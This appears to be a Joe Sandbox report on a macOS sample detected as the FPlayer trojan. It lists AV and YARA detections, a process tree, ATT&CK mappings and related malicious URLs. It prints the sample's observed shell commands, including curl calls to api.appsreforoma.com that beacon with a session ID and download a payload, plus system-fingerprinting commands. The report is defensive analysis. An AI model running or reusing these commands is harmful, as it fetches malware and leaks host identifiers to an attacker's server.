Edit tour

macOS Analysis Report
malw_sampl

Overview

General Information

Sample name:	malw_sampl
Analysis ID:	1428695
MD5:	d3e39930bca4c4b57f6e1f241f0a31c8
SHA1:	ca71f4ee36076497b3989e61352da70fa4dfca8b
SHA256:	02cfb65e0e38ef9ce7e431c66cdc53be3392bfe9bbed4840e18a8b30a1fd8d4a
Infos:

Detection

Score:	68
Range:	0 - 100
Whitelisted:	false

Signatures

Antivirus / Scanner detection for submitted sample

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Machine Learning detection for sample

Executes commands using a shell command-line interpreter

Executes the "curl" command used to transfer data via the network (typically using HTTP/S)

Executes the "defaults" command used to read or modify user specific settings

Executes the "system_profiler" command used to collect detailed system hardware and software information

Mach-O contains sections with high entropy indicating compressed/encrypted content

Queries the macOS product version

Reads hardware related sysctl values

Reads the sysctl hardware model value (potentially used for VM-detection)

Reads the systems hostname

Yara signature match

Classification

Analysis Advice

Exit code suggests that the sample could not be started, look at standard output/error streams for possible reason.

Non-zero exit code suggests an error during the execution. Lookup the error code for hints.

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1428695
Start date and time:	2024-04-19 11:44:17 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 2s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultmacfilecookbook.jbs
Analysis system description:	Virtual Machine, Mojave (Office 16 16.27, Java 11.0.2+9, Adobe Reader 2019.010.20099)
macOS major version:	10.14
CPU architecture:	x86_64
Analysis Mode:	default
Sample name:	malw_sampl
Detection:	MAL
Classification:	mal68.mac@0/4@4/0

Warnings

Excluded IPs from analysis (whitelisted): 17.253.83.204, 17.253.83.198, 23.62.177.105, 17.253.83.205, 17.57.21.63, 184.28.78.153, 184.28.78.137, 23.62.128.29
Excluded domains from analysis (whitelisted): mesu-cdn.apple.com.akadns.net, e11408.d.akamaiedge.net, updates.cdn-apple.com.akadns.net, gateway.icloud.com, e673.dsce9.akamaiedge.net, lcdn-locator-usms11.apple.com.akadns.net, help-ar.apple.com.edgekey.net, lb._dns-sd._udp.0.11.168.192.in-addr.arpa, a1943.dscgi3.akamai.net, mesu-cdn.origin-apple.com.akadns.net, lcdn-locator.apple.com.akadns.net, help.origin-apple.com.akadns.net, lcdn-locator.apple.com, mesu.g.aaplimg.com, updates.g.aaplimg.com, itunes.apple.com.edgekey.net, help.apple.com, mesu.apple.com, init.itunes.apple.com, init-cdn.itunes-apple.com.akadns.net, updates.cdn-apple.com.edgesuite.net

Runtime Messages

Command:	/Users/bernard/Desktop/malw_sampl
PID:	620
Exit Code:	255
Exit Code Info:
Killed:	False
Standard Output:
Standard Error:

Process Tree

System is macvm-mojave

xpcproxy New Fork (PID: 611, Parent: 1)

nsurlstoraged (MD5: 321b0a40e24b45f0af49ba42742b3f64) Arguments: /usr/libexec/nsurlstoraged --privileged

mono-sgen32 New Fork (PID: 620, Parent: 537)

malw_sampl (MD5: d3e39930bca4c4b57f6e1f241f0a31c8) Arguments: /Users/bernard/Desktop/malw_sampl

sh New Fork (PID: 621, Parent: 620)

sh New Fork (PID: 622, Parent: 621)

curl (MD5: 2418204e23e2952e7995f1819a1f78f5) Arguments: curl -L http://api.appsreforoma.com/slg?s=5642A000-E25E-4009-BD13-65DDB1840106&c=0

sh New Fork (PID: 623, Parent: 620)

defaults (MD5: fd63b6120ed5a062dbb6397bc9f8ffb8) Arguments: defaults read /System/Library/CoreServices/SystemVersion.plist ProductVersion

sh New Fork (PID: 624, Parent: 620)

sh New Fork (PID: 625, Parent: 624)

system_profiler (MD5: 271feb2b4c0447da2b7ac523f13a4824) Arguments: system_profiler SPHardwareDataType

system_profiler New Fork (PID: 627, Parent: 625)

sh New Fork (PID: 626, Parent: 624)

awk (MD5: c2a01c11db999f97496e09e12f468956) Arguments: awk /UUID/ { print $3 }

sh New Fork (PID: 628, Parent: 620)

sh New Fork (PID: 629, Parent: 628)

curl (MD5: 2418204e23e2952e7995f1819a1f78f5) Arguments: curl -L http://api.appsreforoma.com/slg?s=5642A000-E25E-4009-BD13-65DDB1840106&c=1

sh New Fork (PID: 630, Parent: 620)

sh New Fork (PID: 631, Parent: 630)

curl (MD5: 2418204e23e2952e7995f1819a1f78f5) Arguments: curl -f0L -o /tmp/5642A000-E25E-4009-BD13-65DDB1840106/CA5E6B96-0321-49D8-8AB7-67DA458B769A http://api.appsreforoma.com/sd/?c=AGFybQ==&u=6661EB4A-CDF0-4E32-8BDC-6B405B1B36B2&s=5642A000-E25E-4009-BD13-65DDB1840106&o=10.14.2&b=2600652593

sh New Fork (PID: 632, Parent: 620)

sh New Fork (PID: 633, Parent: 632)

curl (MD5: 2418204e23e2952e7995f1819a1f78f5) Arguments: curl -L http://api.appsreforoma.com/slg?s=5642A000-E25E-4009-BD13-65DDB1840106&c=3

xpcproxy New Fork (PID: 651, Parent: 1)

eficheck (MD5: 328beb81a2263449258057506bb4987f) Arguments: /usr/libexec/firmwarecheckers/eficheck/eficheck --integrity-check-daemon

cleanup

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
malw_sampl	MacOS_Trojan_Fplayer_1c1fae37	unknown	unknown	0x37c9:$a: 56 41 55 41 54 53 48 83 EC 48 4D 89 C4 48 89 C8 48 89 D1 49 89 F6 49 89 FD 49

Memory Dumps

Source	Rule	Description	Author	Strings
00000620.00000258.1.00000001019db000.00000001019e1000.r-x.sdmp	MacOS_Trojan_Fplayer_1c1fae37	unknown	unknown	0x37c9:$a: 56 41 55 41 54 53 48 83 EC 48 4D 89 C4 48 89 C8 48 89 D1 49 89 F6 49 89 FD 49
00000620.00000258.9.00000001019db000.00000001019e1000.r-x.sdmp	MacOS_Trojan_Fplayer_1c1fae37	unknown	unknown	0x37c9:$a: 56 41 55 41 54 53 48 83 EC 48 4D 89 C4 48 89 C8 48 89 D1 49 89 F6 49 89 FD 49

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: malw_sampl

Avira: detected

Multi AV Scanner detection for submitted file

Source: malw_sampl	Virustotal: Detection: 44%			Perma Link
Source: malw_sampl	ReversingLabs: Detection: 34%

Machine Learning detection for sample

Source: malw_sampl

Joe Sandbox ML: detected

Source: unknown	HTTPS traffic detected: 151.101.131.6:443 -> 192.168.11.12:49347 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.131.6:443 -> 192.168.11.12:49350 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 17.248.193.16:443 -> 192.168.11.12:49349 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.131.6:443 -> 192.168.11.12:49352 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.67.6:443 -> 192.168.11.12:49388 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.67.6:443 -> 192.168.11.12:49389 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.67.6:443 -> 192.168.11.12:49391 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.67.6:443 -> 192.168.11.12:49392 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.67.6:443 -> 192.168.11.12:49390 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.67.6:443 -> 192.168.11.12:49393 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.67.6:443 -> 192.168.11.12:49399 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.195.6:443 -> 192.168.11.12:49401 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.195.6:443 -> 192.168.11.12:49402 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.195.6:443 -> 192.168.11.12:49403 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.195.6:443 -> 192.168.11.12:49404 version: TLS 1.2

Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 17.248.193.17
Source: unknown	TCP traffic detected without corresponding DNS query: 17.248.193.17
Source: unknown	TCP traffic detected without corresponding DNS query: 17.248.193.17
Source: unknown	TCP traffic detected without corresponding DNS query: 17.253.83.196
Source: unknown	TCP traffic detected without corresponding DNS query: 17.253.83.196
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: unknown

DNS traffic detected: queries for: api.appsreforoma.com

Source: malw_sampl, 00000620.00000258.9.0000000111829000.0000000111852000.r--.sdmp	String found in binary or memory: http://crl.apple.com/codesigning.crl0
Source: malw_sampl	String found in binary or memory: http://crl.apple.com/root.crl0
Source: malw_sampl	String found in binary or memory: http://crl.apple.com/timestamp.crl0
Source: malw_sampl	String found in binary or memory: http://ocsp.apple.com/ocsp-devid010
Source: malw_sampl	String found in binary or memory: http://www.apple.com/DTDs/PropertyList-1.0.dtd
Source: malw_sampl, 00000620.00000258.9.0000000111829000.0000000111852000.r--.sdmp	String found in binary or memory: http://www.apple.com/appleca/root.crl0
Source: malw_sampl	String found in binary or memory: http://www.apple.com/appleca0
Source: malw_sampl, 00000620.00000258.9.0000000111829000.0000000111852000.r--.sdmp	String found in binary or memory: http://www.apple.com/certificateauthority0
Source: malw_sampl	String found in binary or memory: https://www.apple.com/appleca/0

Source: unknown	Network traffic detected: HTTP traffic on port 49399 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49403
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49347
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49402
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49401
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49345
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49389
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49388
Source: unknown	Network traffic detected: HTTP traffic on port 49393 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49391 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49388 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49401 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49403 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49352 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49327 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49350 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49399
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49352
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49350
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49393
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49392
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49391
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49390
Source: unknown	Network traffic detected: HTTP traffic on port 49392 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49390 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49389 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49345 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49404 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49402 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49347 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49349 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49349
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49327
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49404

Source: unknown	HTTPS traffic detected: 151.101.131.6:443 -> 192.168.11.12:49347 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.131.6:443 -> 192.168.11.12:49350 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 17.248.193.16:443 -> 192.168.11.12:49349 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.131.6:443 -> 192.168.11.12:49352 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.67.6:443 -> 192.168.11.12:49388 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.67.6:443 -> 192.168.11.12:49389 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.67.6:443 -> 192.168.11.12:49391 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.67.6:443 -> 192.168.11.12:49392 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.67.6:443 -> 192.168.11.12:49390 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.67.6:443 -> 192.168.11.12:49393 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.67.6:443 -> 192.168.11.12:49399 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.195.6:443 -> 192.168.11.12:49401 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.195.6:443 -> 192.168.11.12:49402 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.195.6:443 -> 192.168.11.12:49403 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.195.6:443 -> 192.168.11.12:49404 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: malw_sampl, type: SAMPLE	Matched rule: MacOS_Trojan_Fplayer_1c1fae37 Author: unknown
Source: 00000620.00000258.1.00000001019db000.00000001019e1000.r-x.sdmp, type: MEMORY	Matched rule: MacOS_Trojan_Fplayer_1c1fae37 Author: unknown
Source: 00000620.00000258.9.00000001019db000.00000001019e1000.r-x.sdmp, type: MEMORY	Matched rule: MacOS_Trojan_Fplayer_1c1fae37 Author: unknown

Source: malw_sampl, type: SAMPLE	Matched rule: MacOS_Trojan_Fplayer_1c1fae37 reference_sample = f57e651088dee2236328d09705cef5e98461e97d1eb2150c372d00ca7c685725, os = macos, severity = x86, creation_date = 2021-10-05, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Trojan.Fplayer, fingerprint = abeb3cd51c0ff2e3173739c423778defb9a77bc49b30ea8442e6ec93a2d2d8d2, id = 1c1fae37-8d19-4129-a715-b78163f93fd2, last_modified = 2021-10-25
Source: 00000620.00000258.1.00000001019db000.00000001019e1000.r-x.sdmp, type: MEMORY	Matched rule: MacOS_Trojan_Fplayer_1c1fae37 reference_sample = f57e651088dee2236328d09705cef5e98461e97d1eb2150c372d00ca7c685725, os = macos, severity = x86, creation_date = 2021-10-05, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Trojan.Fplayer, fingerprint = abeb3cd51c0ff2e3173739c423778defb9a77bc49b30ea8442e6ec93a2d2d8d2, id = 1c1fae37-8d19-4129-a715-b78163f93fd2, last_modified = 2021-10-25
Source: 00000620.00000258.9.00000001019db000.00000001019e1000.r-x.sdmp, type: MEMORY	Matched rule: MacOS_Trojan_Fplayer_1c1fae37 reference_sample = f57e651088dee2236328d09705cef5e98461e97d1eb2150c372d00ca7c685725, os = macos, severity = x86, creation_date = 2021-10-05, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Trojan.Fplayer, fingerprint = abeb3cd51c0ff2e3173739c423778defb9a77bc49b30ea8442e6ec93a2d2d8d2, id = 1c1fae37-8d19-4129-a715-b78163f93fd2, last_modified = 2021-10-25

Source: classification engine

Classification label: mal68.mac@0/4@4/0

Source: /Users/bernard/Desktop/malw_sampl (PID: 620)	Shell command executed: sh -c curl -L 'http://api.appsreforoma.com/slg?s=5642A000-E25E-4009-BD13-65DDB1840106&c=0' > /dev/null 2>&1	Jump to behavior
Source: /Users/bernard/Desktop/malw_sampl (PID: 620)	Shell command executed: sh -c defaults read /System/Library/CoreServices/SystemVersion.plist ProductVersion	Jump to behavior
Source: /Users/bernard/Desktop/malw_sampl (PID: 620)	Shell command executed: sh -c system_profiler SPHardwareDataType \| awk '/UUID/ { print $3 }'	Jump to behavior
Source: /Users/bernard/Desktop/malw_sampl (PID: 620)	Shell command executed: sh -c curl -L 'http://api.appsreforoma.com/slg?s=5642A000-E25E-4009-BD13-65DDB1840106&c=1' > /dev/null 2>&1	Jump to behavior
Source: /Users/bernard/Desktop/malw_sampl (PID: 620)	Shell command executed: sh -c curl -f0L -o /tmp/5642A000-E25E-4009-BD13-65DDB1840106/CA5E6B96-0321-49D8-8AB7-67DA458B769A 'http://api.appsreforoma.com/sd/?c=AGFybQ==&u=6661EB4A-CDF0-4E32-8BDC-6B405B1B36B2&s=5642A000-E25E-4009-BD13-65DDB1840106&o=10.14.2&b=2600652593' > /dev/null 2>&1	Jump to behavior
Source: /Users/bernard/Desktop/malw_sampl (PID: 620)	Shell command executed: sh -c curl -L 'http://api.appsreforoma.com/slg?s=5642A000-E25E-4009-BD13-65DDB1840106&c=3' > /dev/null 2>&1	Jump to behavior

Source: /bin/sh (PID: 622)	Curl executable: /usr/bin/curl -> curl -L http://api.appsreforoma.com/slg?s=5642A000-E25E-4009-BD13-65DDB1840106&c=0	Jump to behavior
Source: /bin/sh (PID: 629)	Curl executable: /usr/bin/curl -> curl -L http://api.appsreforoma.com/slg?s=5642A000-E25E-4009-BD13-65DDB1840106&c=1	Jump to behavior
Source: /bin/sh (PID: 631)	Curl executable: /usr/bin/curl -> curl -f0L -o /tmp/5642A000-E25E-4009-BD13-65DDB1840106/CA5E6B96-0321-49D8-8AB7-67DA458B769A http://api.appsreforoma.com/sd/?c=AGFybQ==&u=6661EB4A-CDF0-4E32-8BDC-6B405B1B36B2&s=5642A000-E25E-4009-BD13-65DDB1840106&o=10.14.2&b=2600652593	Jump to behavior
Source: /bin/sh (PID: 633)	Curl executable: /usr/bin/curl -> curl -L http://api.appsreforoma.com/slg?s=5642A000-E25E-4009-BD13-65DDB1840106&c=3	Jump to behavior

Source: /bin/sh (PID: 626)

Awk executable: /usr/bin/awk -> awk /UUID/ { print $3 }

Jump to behavior

Source: submission: malw_sampl

Mach-O header: load_dylib -> /System/Library/Frameworks/ApplicationServices.framework/Versions/A/ApplicationServices

Source: /usr/libexec/firmwarecheckers/eficheck/eficheck (PID: 651)

Random device file read: /dev/random

Jump to behavior

Source: submission

CodeSign Info: Executable=/Users/bernard/Desktop/malw_sampl

Source: malw_sampl

Submission file: section __const with 7.40356224 entropy (max. 8.0)

Source: /usr/sbin/system_profiler (PID: 627)

Sysctl read request: hw.model (6.2)

Jump to behavior

Source: /bin/sh (PID: 623)

Defaults executable: /usr/bin/defaults defaults read /System/Library/CoreServices/SystemVersion.plist ProductVersion

Jump to behavior

Source: /usr/sbin/system_profiler (PID: 627)	Sysctl read request: hw.cpu_freq (6.15)			Jump to behavior
Source: /usr/sbin/system_profiler (PID: 627)	Sysctl read request: hw.memsize (6.24)			Jump to behavior

Source: /bin/sh (PID: 621)	Sysctl requested: kern.hostname (1.10)	Jump to behavior
Source: /bin/sh (PID: 623)	Sysctl requested: kern.hostname (1.10)	Jump to behavior
Source: /bin/sh (PID: 624)	Sysctl requested: kern.hostname (1.10)	Jump to behavior
Source: /bin/sh (PID: 628)	Sysctl requested: kern.hostname (1.10)	Jump to behavior
Source: /bin/sh (PID: 630)	Sysctl requested: kern.hostname (1.10)	Jump to behavior
Source: /bin/sh (PID: 632)	Sysctl requested: kern.hostname (1.10)	Jump to behavior

Source: /bin/sh (PID: 623)

Defaults executable: /usr/bin/defaults defaults read /System/Library/CoreServices/SystemVersion.plist ProductVersion

Jump to behavior

Source: /bin/sh (PID: 625)	System_profiler executable: /usr/sbin/system_profiler system_profiler SPHardwareDataType			Jump to behavior
Source: /usr/sbin/system_profiler (PID: 625)	System_profiler executable: /usr/sbin/system_profiler /usr/sbin/system_profiler -nospawn -xml SPHardwareDataType -detailLevel full			Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	1 Command and Scripting Interpreter	1 Scripting	Path Interception	1 Virtualization/Sandbox Evasion	OS Credential Dumping	1 Security Software Discovery	Remote Services	Data from Local System	1 Encrypted Channel	1 Exfiltration Over Alternative Protocol	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Invalid Code Signature	LSASS Memory	1 Virtualization/Sandbox Evasion	Remote Desktop Protocol	Data from Removable Media	1 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Code Signing	Security Account Manager	5 System Information Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Obfuscated Files or Information	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Number of created Files
Shell
Is malicious
Internet

Source	Detection	Scanner	Label	Link
malw_sampl	100%	Avira	PUA/OSX.FPlayer.A
malw_sampl	44%	Virustotal		Browse
malw_sampl	34%	ReversingLabs	MacOS.PUA.FPlayer
malw_sampl	100%	Joe Sandbox ML

Dropped Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Link
apis.apple.map.fastly.net	0%	Virustotal	Browse
gateway.fe2.apple-dns.net	0%	Virustotal	Browse
api.appsreforoma.com	2%	Virustotal	Browse

Name	IP	Active	Malicious	Antivirus Detection	Reputation
apis.apple.map.fastly.net	151.101.131.6	true	false	0%, Virustotal, Browse	unknown
gateway.fe2.apple-dns.net	17.248.193.16	true	false	0%, Virustotal, Browse	unknown
api.appsreforoma.com	unknown	unknown	true	2%, Virustotal, Browse	unknown
updates.cdn-apple.com	unknown	unknown	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
192.229.211.108	unknown	United States	15133	EDGECASTUS	false
151.101.131.6	apis.apple.map.fastly.net	United States	54113	FASTLYUS	false
151.101.195.6	unknown	United States	54113	FASTLYUS	false
151.101.67.6	unknown	United States	54113	FASTLYUS	false

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
192.229.211.108	AdobeAcrobat2.1.2.msi	Get hash	malicious	AteraAgent	Browse
	440e4d.msi	Get hash	malicious	AteraAgent	Browse
	digitalform.msi	Get hash	malicious	AteraAgent	Browse
	e8iuAWz9pB.exe	Get hash	malicious	Glupteba, Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRAT	Browse
	winrar-x64-620b2.exe	Get hash	malicious	Unknown	Browse
	Facture_160087511.html	Get hash	malicious	ScreenConnect Tool	Browse
	SecuriteInfo.com.Program.Itva.6.25933.6217.exe	Get hash	malicious	Unknown	Browse
	SecuriteInfo.com.Program.Itva.6.25933.6217.exe	Get hash	malicious	Unknown	Browse
	SecuriteInfo.com.Win64.Evo-gen.247.3191.exe	Get hash	malicious	Glupteba, Mars Stealer, PureLog Stealer, RHADAMANTHYS, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Glupteba, Mars Stealer, Vidar	Browse
151.101.131.6	Arc12645415	Get hash	malicious	Unknown	Browse
	https://www.flazio.com/server.html	Get hash	malicious	Unknown	Browse
	https://pub.marq.com/Downloadiiii-Fileee/	Get hash	malicious	Unknown	Browse
	todoist-setup.dmg	Get hash	malicious	Unknown	Browse
	Diogenes	Get hash	malicious	Unknown	Browse
	https://acrobat.adobe.com/id/urn:aaid:sc:VA6C2:c139e8bc-e6cf-46e4-b94b-c8b5dea21199	Get hash	malicious	Unknown	Browse
	Phoenix5b.ipa	Get hash	malicious	Unknown	Browse
	B8rrKspvSE.sample	Get hash	malicious	DDosia	Browse
151.101.195.6	89.kk	Get hash	malicious	Unknown	Browse
	Arc12645415	Get hash	malicious	Unknown	Browse
	SME.dmg	Get hash	malicious	Unknown	Browse
	3MVd1q7ygy.macho	Get hash	malicious	Unknown	Browse
	https://www.flazio.com/server.html	Get hash	malicious	Unknown	Browse
	todoist-setup.dmg	Get hash	malicious	Unknown	Browse
	Diogenes	Get hash	malicious	Unknown	Browse
	http://nextnovatech.com	Get hash	malicious	Unknown	Browse
	Phoenix5b.ipa	Get hash	malicious	Unknown	Browse
	http://api.statisticsong.com/	Get hash	malicious	Unknown	Browse
151.101.67.6	Arc12645415	Get hash	malicious	Unknown	Browse
	3MVd1q7ygy.macho	Get hash	malicious	Unknown	Browse
	https://www.flazio.com/server.html	Get hash	malicious	Unknown	Browse
	http://marketplace-item-details-98756222.zya.me	Get hash	malicious	Unknown	Browse
	ztfzDO15sO.dmg	Get hash	malicious	AMOS Stealer	Browse
	http://api.statisticsong.com/	Get hash	malicious	Unknown	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
apis.apple.map.fastly.net	89.kk	Get hash	malicious	Unknown	Browse	151.101.3.6
	Arc12645415	Get hash	malicious	Unknown	Browse	151.101.131.6
	SME.dmg	Get hash	malicious	Unknown	Browse	151.101.3.6
	3MVd1q7ygy.macho	Get hash	malicious	Unknown	Browse	151.101.131.6
	https://www.flazio.com/server.html	Get hash	malicious	Unknown	Browse	151.101.3.6
	https://pub.marq.com/Downloadiiii-Fileee/	Get hash	malicious	Unknown	Browse	151.101.3.6
	todoist-setup.dmg	Get hash	malicious	Unknown	Browse	151.101.131.6
	http://marketplace-item-details-98756222.zya.me	Get hash	malicious	Unknown	Browse	151.101.195.6
	Diogenes	Get hash	malicious	Unknown	Browse	151.101.195.6
	https://acrobat.adobe.com/id/urn:aaid:sc:VA6C2:c139e8bc-e6cf-46e4-b94b-c8b5dea21199	Get hash	malicious	Unknown	Browse	151.101.131.6

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
FASTLYUS	Play_NewMessage_17April2024_Audio.htm	Get hash	malicious	Unknown	Browse	151.101.194.137
	http://tracking.elastic.iscarcup.com/tracking/click?d=XVOGkKKIFI1BUi5gqgZHAdRPhk99njZvP0qXh2IpArKp9RzCSjeoWkfJDrjbcvw75j380eQ4qSrYjhK4RegFgVWSX5L2beQO2AeFGF72kzLV5bUDHAc9_x1G5mw8AznhlHtuepCFbAQZbboWjeiG8YOae_yZBP5-luynay2YDr9Jmf0rVcJIVEgp8xRayU7B_A2	Get hash	malicious	Unknown	Browse	151.101.194.208
	http://monacolife.net	Get hash	malicious	Unknown	Browse	151.101.12.159
	https://www.joesandbox.com/login	Get hash	malicious	Unknown	Browse	185.199.110.133
	https://jobrad.us1.list-manage.com/track/click?u=9c40c69097d5cc62620fab666&id=4174455835&e=1c8272e83c	Get hash	malicious	Unknown	Browse	151.101.1.229
	https://librospy.com/	Get hash	malicious	Unknown	Browse	151.101.64.114
	https://scsang.cn/	Get hash	malicious	Unknown	Browse	151.101.12.157
	https://cvn7.sa.com/invoice.html?app=	Get hash	malicious	HTMLPhisher	Browse	151.101.52.193
	https://15ab0ot.pages.dev/	Get hash	malicious	PayPal Phisher	Browse	151.101.193.21
	https://b5qm3iux.dreamwp.com/erepxs/tracking/fV5EjH/msg.php?id=97973728	Get hash	malicious	Unknown	Browse	151.101.66.137
FASTLYUS	Play_NewMessage_17April2024_Audio.htm	Get hash	malicious	Unknown	Browse	151.101.194.137
	http://tracking.elastic.iscarcup.com/tracking/click?d=XVOGkKKIFI1BUi5gqgZHAdRPhk99njZvP0qXh2IpArKp9RzCSjeoWkfJDrjbcvw75j380eQ4qSrYjhK4RegFgVWSX5L2beQO2AeFGF72kzLV5bUDHAc9_x1G5mw8AznhlHtuepCFbAQZbboWjeiG8YOae_yZBP5-luynay2YDr9Jmf0rVcJIVEgp8xRayU7B_A2	Get hash	malicious	Unknown	Browse	151.101.194.208
	http://monacolife.net	Get hash	malicious	Unknown	Browse	151.101.12.159
	https://www.joesandbox.com/login	Get hash	malicious	Unknown	Browse	185.199.110.133
	https://jobrad.us1.list-manage.com/track/click?u=9c40c69097d5cc62620fab666&id=4174455835&e=1c8272e83c	Get hash	malicious	Unknown	Browse	151.101.1.229
	https://librospy.com/	Get hash	malicious	Unknown	Browse	151.101.64.114
	https://scsang.cn/	Get hash	malicious	Unknown	Browse	151.101.12.157
	https://cvn7.sa.com/invoice.html?app=	Get hash	malicious	HTMLPhisher	Browse	151.101.52.193
	https://15ab0ot.pages.dev/	Get hash	malicious	PayPal Phisher	Browse	151.101.193.21
	https://b5qm3iux.dreamwp.com/erepxs/tracking/fV5EjH/msg.php?id=97973728	Get hash	malicious	Unknown	Browse	151.101.66.137
EDGECASTUS	New Voicemail_Daiichi-Sankyo.html	Get hash	malicious	HTMLPhisher	Browse	152.199.4.44
	http://monacolife.net	Get hash	malicious	Unknown	Browse	152.199.5.152
	https://www.joesandbox.com/login	Get hash	malicious	Unknown	Browse	152.199.5.152
	https://cvn7.sa.com/invoice.html?app=	Get hash	malicious	HTMLPhisher	Browse	152.199.4.44
	Payment Receipt .html	Get hash	malicious	HTMLPhisher	Browse	72.21.91.237
	https://tracker.club-os.com/campaign/click?msgId=f8ea317d963149a518aa35e03e5541f797badf3c&target=splendidanimations.com%2F%40%2FBigge/aDRmd79087aDRmd79087aDRmd/ZHN3ZWF6YUBiaWdnZS5jb20=	Get hash	malicious	HTMLPhisher	Browse	152.195.19.97
